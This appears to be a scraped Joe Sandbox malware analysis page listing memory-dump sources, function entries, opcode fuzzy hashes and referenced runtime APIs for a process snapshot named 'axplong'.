Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: 1acf9ba6f8a469677a165d1beb15d8ac5f379a4fd80ac22829c636e62e93d89a
Instruction ID: 24f5076a7a7d5cd3a1a1fd9e710b7201860865492d445cebcd1a05fefe71801a
Opcode Fuzzy Hash: 1acf9ba6f8a469677a165d1beb15d8ac5f379a4fd80ac22829c636e62e93d89a
Instruction Fuzzy Hash: 99D0223254353893DB312B98AC058ACBF1AAB40B243840513E90523320CEF1EC419BD4

Function 005F7D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 005F7EFF

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: 0bc8ba318b28b0490684ae2cf1df99dbc9fa9e8da5c5a9e657a44eda8c42bdfb
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: AC5177B020C60D57DB389A3C88997BE6F9EBF9D300F54085ED742D7682CA5D9E448352

Function 005C4CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b74543d13355c1280819fefdb2c3c292e3b4f4d503b44cc1f92c144347665211
Instruction ID: badac55e1d54b2a2a980dcc3402a70f6739fd94ba503b272ed72dd3267be6f2d
Opcode Fuzzy Hash: b74543d13355c1280819fefdb2c3c292e3b4f4d503b44cc1f92c144347665211
Instruction Fuzzy Hash: 0F226FB3F515144BDB4CCE9DDCA27ECB2E3AFD8214B0E903DA40AE3345EA79D9158A44

Function 00606F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63db245d3b90ae2f9ea94294bf899695cb4b4b959ac8fed694d6d4e29aea6150
Instruction ID: 496a303b527e720ebcf66afae24a6019f7839a2f242a405993be6fbd7479a68a
Opcode Fuzzy Hash: 63db245d3b90ae2f9ea94294bf899695cb4b4b959ac8fed694d6d4e29aea6150
Instruction Fuzzy Hash: E1B19071650605DFD718CF28C486B967BA2FF45364F298698E89ACF3E1C335E992CB40

Function 005C4AF0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4352392feb08cc57509433ca70079e0c29f2ff42fc320cce95dfe6a3a87a5596
Instruction ID: 935dde0f08f332ddfb4b4fe74aa19b8d8f03691fab542a6fcf80bc987e810f61
Opcode Fuzzy Hash: 4352392feb08cc57509433ca70079e0c29f2ff42fc320cce95dfe6a3a87a5596
Instruction Fuzzy Hash: 4051A1716183928FC319CF2D852567ABFF2BF95200F084A9EE0D687392D774DA48CB91

Function 0060777B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 843bbfdb14643ee3a3e3abf83a1b0f0f076ef09fbc7c1e1bcfd9ea405b67d6d0
Instruction ID: f799f7d66684d5a0740f445b99162258662f80caf43fcaa4f902f3d92720e0b6
Opcode Fuzzy Hash: 843bbfdb14643ee3a3e3abf83a1b0f0f076ef09fbc7c1e1bcfd9ea405b67d6d0
Instruction Fuzzy Hash: E821B673F208394B770CC47E8C5727DB6E1C68C541745823AE8A6EA2C1D968D917E2E4

Function 0060765B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f5496ac7bcdfc99f55e81891d9ca3e3a18f2999c107d87cbdec9fe74cbc1212
Instruction ID: 88c6406b5f16f9e2d6bdd25df6b6ab44a9d2362f5fcfde9cf199e06da8b4ccc8
Opcode Fuzzy Hash: 1f5496ac7bcdfc99f55e81891d9ca3e3a18f2999c107d87cbdec9fe74cbc1212
Instruction Fuzzy Hash: 14117723F30C255A675C816D8C1727AA5D3DBD825071F533AD827E72C4E9A4EE23D290

Function 00608720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 42c3a6d21939c4825aa75853c0d055b339bea7bd0ed135ec25cbe1ca2a8acdff
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 6611D37B2801414FD61CC62DC9B46EFA797EAC5321B3C427AD0C14B7DCDA2299459900

Function 005F645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b0f65b74406063e3ccf92cf25c89b8070ac2b4dd8eaa2bad9479689e3a5aff
Instruction ID: 73ab8a71d8b3899b309750288c2bb5f7740b6a32b2af2163b546f3791cb7baa3
Opcode Fuzzy Hash: 30b0f65b74406063e3ccf92cf25c89b8070ac2b4dd8eaa2bad9479689e3a5aff
Instruction Fuzzy Hash: 33E08C3014260C6FDE257B24C89DEAA3F1AFB81348F108810FE0886221CB29EC82DA91

Function 005FA1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 89b5e370cabae8e149589e852ce9eef3b52e7372ae97b675a07fb0c74d6e89b5
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: C3E04672911228EBCB25DB88C948D9AF6ACFB88B00F164096B605D3241C374EF00C7D1

Function 005F4770 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 005F47A7
___except_validate_context_record.LIBVCRUNTIME ref: 005F47AF
_ValidateLocalCookies.LIBCMT ref: 005F4838
__IsNonwritableInCurrentImage.LIBCMT ref: 005F4863
_ValidateLocalCookies.LIBCMT ref: 005F48B8

Strings

csm, xrefs: 005F484D

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 4aeee64b3a714bcded1a2ecd6d7a773b6867bb0ea83bae747510bbaabebfb97c
Instruction ID: 799808e8f4e5db61ce0529c83d50be7c6bf098830eb528d9659d4c083365e91b
Opcode Fuzzy Hash: 4aeee64b3a714bcded1a2ecd6d7a773b6867bb0ea83bae747510bbaabebfb97c
Instruction Fuzzy Hash: 8D51B030A0024DABCF10DF68C884ABF7FA6BF45358F148095EA149B352D73AEA55CF90

Function 005F70C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 005F710B

Strings

.com, xrefs: 005F714B
.cmd, xrefs: 005F7129
.bat, xrefs: 005F713A
.exe, xrefs: 005F7118

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: ff2aba81085c726a749dbb81280f4c2d07a2990339059f2f323fabfd00d04568
Instruction ID: 65e6d6620cda8d29c334a3a8ed94c03b86a3eb7ff6f3f2b8ddacbee4fa8a12a7
Opcode Fuzzy Hash: ff2aba81085c726a749dbb81280f4c2d07a2990339059f2f323fabfd00d04568
Instruction Fuzzy Hash: 5001C82760861F2666186459DC12A7B5F99BBC6BB471A002AFB44F72C1DF8DDC52C1A0

Function 005C2E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 005C2F1F
__Mtx_unlock.LIBCPMT ref: 005C2F8C
__Cnd_broadcast.LIBCPMT ref: 005C2FA3
__Mtx_unlock.LIBCPMT ref: 005C30B5
__Mtx_unlock.LIBCPMT ref: 005C315B

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 55ca83ac34d4589cbc395730acaf95ee555c14571d295c2870160f0fd5d385f8
Instruction ID: 3c6aa819aa63c8cc0ff6c05bfae7998094989ab1cb337d9616c645be67793f5b
Opcode Fuzzy Hash: 55ca83ac34d4589cbc395730acaf95ee555c14571d295c2870160f0fd5d385f8
Instruction Fuzzy Hash: C1A1D17190121A9FDB21DFA8C849B5ABFB8FF55314F14852EE815D7341EB31EA04CB91

Function 005C2670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 005C2806
___std_exception_destroy.LIBVCRUNTIME ref: 005C28A0

Strings

P#\, xrefs: 005C2811
P#\, xrefs: 005C27BE, 005C2899

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: P#\$P#\
API String ID: 2970364248-1576673276
Opcode ID: 98c9d2bff537ada225bc64077ab66078471dcaac0464d2422fa6a9022e1a1c18
Instruction ID: 03ae5769bed3b85fd25e8c780886ea936e7c5166fad9fd6627b2f60760a8f40d
Opcode Fuzzy Hash: 98c9d2bff537ada225bc64077ab66078471dcaac0464d2422fa6a9022e1a1c18
Instruction Fuzzy Hash: 62715D71A002499FDB14CFA8C885BEDFFB5FF59310F14812EE805A7285E774A984CBA5

Function 005D7870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON

Download Yara Rule

APIs

__Cnd_unregister_at_thread_exit.LIBCPMT ref: 005D795C
__Cnd_destroy_in_situ.LIBCPMT ref: 005D7968
